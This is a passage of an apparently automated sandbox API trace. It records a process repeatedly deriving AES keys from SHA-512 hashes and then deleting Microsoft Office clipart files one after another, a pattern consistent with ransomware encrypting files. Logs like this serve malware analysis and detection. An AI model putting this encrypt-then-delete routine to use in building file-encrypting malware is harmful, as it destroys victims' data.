CryptSetKeyParam (hKey=0x9ad4b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0182.601] CryptSetKeyParam (hKey=0x9ad4b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0182.601] wcslen (_String="\\\\?\\") returned 0x4 [0182.604] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01218_.WMF") returned 1 [0182.604] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01218_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01218_.wmf")) returned 1 [0182.605] CryptDestroyKey (hKey=0x9ad7b8) returned 1 [0182.605] wcslen (_String="OK") returned 0x2 [0182.605] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0182.605] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0182.605] CryptDestroyKey (hKey=0x9ad4b8) returned 1 [0182.605] CryptDestroyHash (hHash=0x9ad1f8) returned 1 [0182.605] CryptReleaseContext (hProv=0x8e2e68, dwFlags=0x0) returned 1 [0182.607] CryptCreateHash (in: hProv=0x8e3000, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444a1c | out: phHash=0x1d444a1c) returned 1 [0182.607] CryptHashData (hHash=0x9ad7f8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0182.607] CryptDeriveKey (in: hProv=0x8e3000, Algid=0x6610, hBaseData=0x9ad7f8, dwFlags=0x4, phKey=0x1d444a20 | out: phKey=0x1d444a20*=0x9ad138) returned 1 [0182.607] CryptSetKeyParam (hKey=0x9ad138, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0182.607] CryptSetKeyParam (hKey=0x9ad138, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0182.607] wcslen (_String="\\\\?\\") returned 0x4 [0182.634] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01251_.WMF") returned 1 [0182.634] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01251_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01251_.wmf")) returned 1 [0182.636] CryptDestroyKey (hKey=0x9ad2b8) returned 1 [0182.636] wcslen (_String="OK") returned 0x2 [0182.636] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0182.636] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0182.636] CryptDestroyKey (hKey=0x9ad138) returned 1 [0182.636] CryptDestroyHash (hHash=0x9ad7f8) returned 1 [0182.636] CryptReleaseContext (hProv=0x8e3000, dwFlags=0x0) returned 1 [0182.638] CryptCreateHash (in: hProv=0x8e3aa0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4449ec | out: phHash=0x1d4449ec) returned 1 [0182.639] CryptHashData (hHash=0x9ad2b8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0182.639] CryptDeriveKey (in: hProv=0x8e3aa0, Algid=0x6610, hBaseData=0x9ad2b8, dwFlags=0x4, phKey=0x1d4449f0 | out: phKey=0x1d4449f0*=0x9ad1f8) returned 1 [0182.639] CryptSetKeyParam (hKey=0x9ad1f8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0182.639] CryptSetKeyParam (hKey=0x9ad1f8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0182.639] wcslen (_String="\\\\?\\") returned 0x4 [0182.645] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01545_.WMF") returned 1 [0182.645] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01545_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01545_.wmf")) returned 1 [0182.646] CryptDestroyKey (hKey=0x9ad6b8) returned 1 [0182.646] wcslen (_String="OK") returned 0x2 [0182.646] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0182.646] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0182.646] CryptDestroyKey (hKey=0x9ad1f8) returned 1 [0182.646] CryptDestroyHash (hHash=0x9ad2b8) returned 1 [0182.646] CryptReleaseContext (hProv=0x8e3aa0, dwFlags=0x0) returned 1 [0182.649] CryptCreateHash (in: hProv=0x8e2ef0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44498c | out: phHash=0x1d44498c) returned 1 [0182.649] CryptHashData (hHash=0x9ad178, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0182.649] CryptDeriveKey (in: hProv=0x8e2ef0, Algid=0x6610, hBaseData=0x9ad178, dwFlags=0x4, phKey=0x1d444990 | out: phKey=0x1d444990*=0x9ad538) returned 1 [0182.649] CryptSetKeyParam (hKey=0x9ad538, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0182.649] CryptSetKeyParam (hKey=0x9ad538, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0182.649] wcslen (_String="\\\\?\\") returned 0x4 [0182.654] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02122_.WMF") returned 1 [0182.654] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02122_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an02122_.wmf")) returned 1 [0182.655] CryptDestroyKey (hKey=0x9ad738) returned 1 [0182.655] wcslen (_String="OK") returned 0x2 [0182.655] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0182.655] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0182.655] CryptDestroyKey (hKey=0x9ad538) returned 1 [0182.655] CryptDestroyHash (hHash=0x9ad178) returned 1 [0182.655] CryptReleaseContext (hProv=0x8e2ef0, dwFlags=0x0) returned 1 [0182.658] CryptCreateHash (in: hProv=0x8e3088, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4447dc | out: phHash=0x1d4447dc) returned 1 [0182.658] CryptHashData (hHash=0x9ad5f8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0182.658] CryptDeriveKey (in: hProv=0x8e3088, Algid=0x6610, hBaseData=0x9ad5f8, dwFlags=0x4, phKey=0x1d4447e0 | out: phKey=0x1d4447e0*=0x9ad478) returned 1 [0182.658] CryptSetKeyParam (hKey=0x9ad478, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0182.658] CryptSetKeyParam (hKey=0x9ad478, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0182.658] wcslen (_String="\\\\?\\") returned 0x4 [0182.764] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02559_.WMF") returned 1 [0182.764] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02559_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an02559_.wmf")) returned 1 [0182.765] CryptDestroyKey (hKey=0x9ad638) returned 1 [0182.765] wcslen (_String="OK") returned 0x2 [0182.765] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0182.765] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0182.765] CryptDestroyKey (hKey=0x9ad478) returned 1 [0182.765] CryptDestroyHash (hHash=0x9ad5f8) returned 1 [0182.765] CryptReleaseContext (hProv=0x8e3088, dwFlags=0x0) returned 1 [0182.768] CryptCreateHash (in: hProv=0x8e3880, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444a1c | out: phHash=0x1d444a1c) returned 1 [0182.768] CryptHashData (hHash=0x9ad7f8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0182.768] CryptDeriveKey (in: hProv=0x8e3880, Algid=0x6610, hBaseData=0x9ad7f8, dwFlags=0x4, phKey=0x1d444a20 | out: phKey=0x1d444a20*=0x9ad738) returned 1 [0182.768] CryptSetKeyParam (hKey=0x9ad738, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0182.768] CryptSetKeyParam (hKey=0x9ad738, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0182.768] wcslen (_String="\\\\?\\") returned 0x4 [0182.790] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02724_.WMF") returned 1 [0182.790] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02724_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an02724_.wmf")) returned 1 [0182.792] CryptDestroyKey (hKey=0x9ad438) returned 1 [0182.792] wcslen (_String="OK") returned 0x2 [0182.792] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0182.792] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0182.792] CryptDestroyKey (hKey=0x9ad738) returned 1 [0182.792] CryptDestroyHash (hHash=0x9ad7f8) returned 1 [0182.792] CryptReleaseContext (hProv=0x8e3880, dwFlags=0x0) returned 1 [0182.794] CryptCreateHash (in: hProv=0x8e3088, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444824 | out: phHash=0x1d444824) returned 1 [0182.794] CryptHashData (hHash=0x9ad178, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0182.794] CryptDeriveKey (in: hProv=0x8e3088, Algid=0x6610, hBaseData=0x9ad178, dwFlags=0x4, phKey=0x1d444828 | out: phKey=0x1d444828*=0x9ad578) returned 1 [0182.794] CryptSetKeyParam (hKey=0x9ad578, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0182.794] CryptSetKeyParam (hKey=0x9ad578, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0182.794] wcslen (_String="\\\\?\\") returned 0x4 [0182.850] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN03500_.WMF") returned 1 [0182.850] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN03500_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an03500_.wmf")) returned 1 [0182.852] CryptDestroyKey (hKey=0x9ad138) returned 1 [0182.852] wcslen (_String="OK") returned 0x2 [0182.852] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0182.852] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0182.852] CryptDestroyKey (hKey=0x9ad578) returned 1 [0182.852] CryptDestroyHash (hHash=0x9ad178) returned 1 [0182.852] CryptReleaseContext (hProv=0x8e3088, dwFlags=0x0) returned 1 [0182.854] CryptCreateHash (in: hProv=0x8e3660, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444884 | out: phHash=0x1d444884) returned 1 [0182.854] CryptHashData (hHash=0x9ad8b8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0182.854] CryptDeriveKey (in: hProv=0x8e3660, Algid=0x6610, hBaseData=0x9ad8b8, dwFlags=0x4, phKey=0x1d444888 | out: phKey=0x1d444888*=0x9ad2f8) returned 1 [0182.854] CryptSetKeyParam (hKey=0x9ad2f8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0182.854] CryptSetKeyParam (hKey=0x9ad2f8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0182.854] wcslen (_String="\\\\?\\") returned 0x4 [0182.889] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04108_.WMF") returned 1 [0182.889] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04108_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04108_.wmf")) returned 1 [0182.890] CryptDestroyKey (hKey=0x9ad878) returned 1 [0182.890] wcslen (_String="OK") returned 0x2 [0182.890] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0182.890] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0182.890] CryptDestroyKey (hKey=0x9ad2f8) returned 1 [0182.890] CryptDestroyHash (hHash=0x9ad8b8) returned 1 [0182.890] CryptReleaseContext (hProv=0x8e3660, dwFlags=0x0) returned 1 [0182.892] CryptCreateHash (in: hProv=0x8e37f8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4449a4 | out: phHash=0x1d4449a4) returned 1 [0182.892] CryptHashData (hHash=0x9ad7f8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0182.892] CryptDeriveKey (in: hProv=0x8e37f8, Algid=0x6610, hBaseData=0x9ad7f8, dwFlags=0x4, phKey=0x1d4449a8 | out: phKey=0x1d4449a8*=0x9ad678) returned 1 [0182.892] CryptSetKeyParam (hKey=0x9ad678, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0182.892] CryptSetKeyParam (hKey=0x9ad678, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0182.892] wcslen (_String="\\\\?\\") returned 0x4 [0182.915] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04117_.WMF") returned 1 [0182.915] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04117_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04117_.wmf")) returned 1 [0182.916] CryptDestroyKey (hKey=0x9ad1f8) returned 1 [0182.916] wcslen (_String="OK") returned 0x2 [0182.916] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0182.916] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0182.916] CryptDestroyKey (hKey=0x9ad678) returned 1 [0182.916] CryptDestroyHash (hHash=0x9ad7f8) returned 1 [0182.916] CryptReleaseContext (hProv=0x8e37f8, dwFlags=0x0) returned 1 [0182.918] CryptCreateHash (in: hProv=0x8e3a18, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444914 | out: phHash=0x1d444914) returned 1 [0182.918] CryptHashData (hHash=0x9ad2f8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0182.918] CryptDeriveKey (in: hProv=0x8e3a18, Algid=0x6610, hBaseData=0x9ad2f8, dwFlags=0x4, phKey=0x1d444918 | out: phKey=0x1d444918*=0x9ad478) returned 1 [0182.918] CryptSetKeyParam (hKey=0x9ad478, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0182.918] CryptSetKeyParam (hKey=0x9ad478, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0182.918] wcslen (_String="\\\\?\\") returned 0x4 [0182.960] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04134_.WMF") returned 1 [0182.960] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04134_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04134_.wmf")) returned 1 [0182.961] CryptDestroyKey (hKey=0x9ad178) returned 1 [0182.961] wcslen (_String="OK") returned 0x2 [0182.961] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0182.961] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0182.961] CryptDestroyKey (hKey=0x9ad478) returned 1 [0182.961] CryptDestroyHash (hHash=0x9ad2f8) returned 1 [0182.961] CryptReleaseContext (hProv=0x8e3a18, dwFlags=0x0) returned 1 [0182.963] CryptCreateHash (in: hProv=0x8e35d8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4449ec | out: phHash=0x1d4449ec) returned 1 [0182.963] CryptHashData (hHash=0x9ad1f8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0182.963] CryptDeriveKey (in: hProv=0x8e35d8, Algid=0x6610, hBaseData=0x9ad1f8, dwFlags=0x4, phKey=0x1d4449f0 | out: phKey=0x1d4449f0*=0x9ad538) returned 1 [0182.963] CryptSetKeyParam (hKey=0x9ad538, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0182.963] CryptSetKeyParam (hKey=0x9ad538, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0182.963] wcslen (_String="\\\\?\\") returned 0x4 [0182.972] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04174_.WMF") returned 1 [0182.972] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04174_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04174_.wmf")) returned 1 [0182.973] CryptDestroyKey (hKey=0x9ad1b8) returned 1 [0182.973] wcslen (_String="OK") returned 0x2 [0182.973] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0182.973] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0182.973] CryptDestroyKey (hKey=0x9ad538) returned 1 [0182.973] CryptDestroyHash (hHash=0x9ad1f8) returned 1 [0182.973] CryptReleaseContext (hProv=0x8e35d8, dwFlags=0x0) returned 1 [0182.975] CryptCreateHash (in: hProv=0x8e32a8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44480c | out: phHash=0x1d44480c) returned 1 [0182.975] CryptHashData (hHash=0x9ad738, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0182.975] CryptDeriveKey (in: hProv=0x8e32a8, Algid=0x6610, hBaseData=0x9ad738, dwFlags=0x4, phKey=0x1d444810 | out: phKey=0x1d444810*=0x9ad138) returned 1 [0182.975] CryptSetKeyParam (hKey=0x9ad138, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0182.975] CryptSetKeyParam (hKey=0x9ad138, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0182.975] wcslen (_String="\\\\?\\") returned 0x4 [0182.989] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04191_.WMF") returned 1 [0182.989] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04191_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04191_.wmf")) returned 1 [0182.990] CryptDestroyKey (hKey=0x9ad7f8) returned 1 [0182.990] wcslen (_String="OK") returned 0x2 [0182.990] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0182.990] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0182.990] CryptDestroyKey (hKey=0x9ad138) returned 1 [0182.990] CryptDestroyHash (hHash=0x9ad738) returned 1 [0182.990] CryptReleaseContext (hProv=0x8e32a8, dwFlags=0x0) returned 1 [0182.992] CryptCreateHash (in: hProv=0x8e3088, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444794 | out: phHash=0x1d444794) returned 1 [0182.992] CryptHashData (hHash=0x9ad2b8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0182.992] CryptDeriveKey (in: hProv=0x8e3088, Algid=0x6610, hBaseData=0x9ad2b8, dwFlags=0x4, phKey=0x1d444798 | out: phKey=0x1d444798*=0x9ad4b8) returned 1 [0182.992] CryptSetKeyParam (hKey=0x9ad4b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0182.992] CryptSetKeyParam (hKey=0x9ad4b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0182.992] wcslen (_String="\\\\?\\") returned 0x4 [0183.084] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04195_.WMF") returned 1 [0183.084] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04195_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04195_.wmf")) returned 1 [0183.085] CryptDestroyKey (hKey=0x9ad338) returned 1 [0183.085] wcslen (_String="OK") returned 0x2 [0183.085] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0183.085] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0183.085] CryptDestroyKey (hKey=0x9ad4b8) returned 1 [0183.085] CryptDestroyHash (hHash=0x9ad2b8) returned 1 [0183.085] CryptReleaseContext (hProv=0x8e3088, dwFlags=0x0) returned 1 [0183.087] CryptCreateHash (in: hProv=0x8e3aa0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4449d4 | out: phHash=0x1d4449d4) returned 1 [0183.087] CryptHashData (hHash=0x9ad578, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0183.087] CryptDeriveKey (in: hProv=0x8e3aa0, Algid=0x6610, hBaseData=0x9ad578, dwFlags=0x4, phKey=0x1d4449d8 | out: phKey=0x1d4449d8*=0x9ad1b8) returned 1 [0183.087] CryptSetKeyParam (hKey=0x9ad1b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0183.087] CryptSetKeyParam (hKey=0x9ad1b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0183.087] wcslen (_String="\\\\?\\") returned 0x4 [0183.103] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04196_.WMF") returned 1 [0183.103] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04196_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04196_.wmf")) returned 1 [0183.104] CryptDestroyKey (hKey=0x9ad678) returned 1 [0183.104] wcslen (_String="OK") returned 0x2 [0183.104] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0183.104] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0183.104] CryptDestroyKey (hKey=0x9ad1b8) returned 1 [0183.104] CryptDestroyHash (hHash=0x9ad578) returned 1 [0183.104] CryptReleaseContext (hProv=0x8e3aa0, dwFlags=0x0) returned 1 [0183.106] CryptCreateHash (in: hProv=0x8e3110, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4447dc | out: phHash=0x1d4447dc) returned 1 [0183.106] CryptHashData (hHash=0x9ad178, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0183.106] CryptDeriveKey (in: hProv=0x8e3110, Algid=0x6610, hBaseData=0x9ad178, dwFlags=0x4, phKey=0x1d4447e0 | out: phKey=0x1d4447e0*=0x9ad638) returned 1 [0183.106] CryptSetKeyParam (hKey=0x9ad638, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0183.106] CryptSetKeyParam (hKey=0x9ad638, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0183.106] wcslen (_String="\\\\?\\") returned 0x4 [0183.158] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04206_.WMF") returned 1 [0183.158] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04206_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04206_.wmf")) returned 1 [0183.159] CryptDestroyKey (hKey=0x9ad5b8) returned 1 [0183.159] wcslen (_String="OK") returned 0x2 [0183.159] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0183.159] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0183.159] CryptDestroyKey (hKey=0x9ad638) returned 1 [0183.159] CryptDestroyHash (hHash=0x9ad178) returned 1 [0183.159] CryptReleaseContext (hProv=0x8e3110, dwFlags=0x0) returned 1 [0183.162] CryptCreateHash (in: hProv=0x8e3b28, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444764 | out: phHash=0x1d444764) returned 1 [0183.162] CryptHashData (hHash=0x9ad778, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0183.162] CryptDeriveKey (in: hProv=0x8e3b28, Algid=0x6610, hBaseData=0x9ad778, dwFlags=0x4, phKey=0x1d444768 | out: phKey=0x1d444768*=0x9ad678) returned 1 [0183.162] CryptSetKeyParam (hKey=0x9ad678, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0183.162] CryptSetKeyParam (hKey=0x9ad678, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0183.162] wcslen (_String="\\\\?\\") returned 0x4 [0183.779] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04225_.WMF") returned 1 [0183.779] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04225_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04225_.wmf")) returned 1 [0183.780] CryptDestroyKey (hKey=0x9ad7f8) returned 1 [0183.780] wcslen (_String="OK") returned 0x2 [0183.780] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0183.780] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0183.780] CryptDestroyKey (hKey=0x9ad678) returned 1 [0183.780] CryptDestroyHash (hHash=0x9ad778) returned 1 [0183.780] CryptReleaseContext (hProv=0x8e3b28, dwFlags=0x0) returned 1 [0183.782] CryptCreateHash (in: hProv=0x8e33b8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444914 | out: phHash=0x1d444914) returned 1 [0183.782] CryptHashData (hHash=0x9ad1f8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0183.782] CryptDeriveKey (in: hProv=0x8e33b8, Algid=0x6610, hBaseData=0x9ad1f8, dwFlags=0x4, phKey=0x1d444918 | out: phKey=0x1d444918*=0x9ad138) returned 1 [0183.782] CryptSetKeyParam (hKey=0x9ad138, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0183.782] CryptSetKeyParam (hKey=0x9ad138, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0183.782] wcslen (_String="\\\\?\\") returned 0x4 [0183.793] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04235_.WMF") returned 1 [0183.793] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04235_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04235_.wmf")) returned 1 [0183.794] CryptDestroyKey (hKey=0x9ad578) returned 1 [0183.794] wcslen (_String="OK") returned 0x2 [0183.794] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0183.794] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0183.794] CryptDestroyKey (hKey=0x9ad138) returned 1 [0183.794] CryptDestroyHash (hHash=0x9ad1f8) returned 1 [0183.794] CryptReleaseContext (hProv=0x8e33b8, dwFlags=0x0) returned 1 [0183.797] CryptCreateHash (in: hProv=0x8e3440, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4449d4 | out: phHash=0x1d4449d4) returned 1 [0183.797] CryptHashData (hHash=0x9ad1b8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0183.797] CryptDeriveKey (in: hProv=0x8e3440, Algid=0x6610, hBaseData=0x9ad1b8, dwFlags=0x4, phKey=0x1d4449d8 | out: phKey=0x1d4449d8*=0x9ad738) returned 1 [0183.797] CryptSetKeyParam (hKey=0x9ad738, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0183.797] CryptSetKeyParam (hKey=0x9ad738, 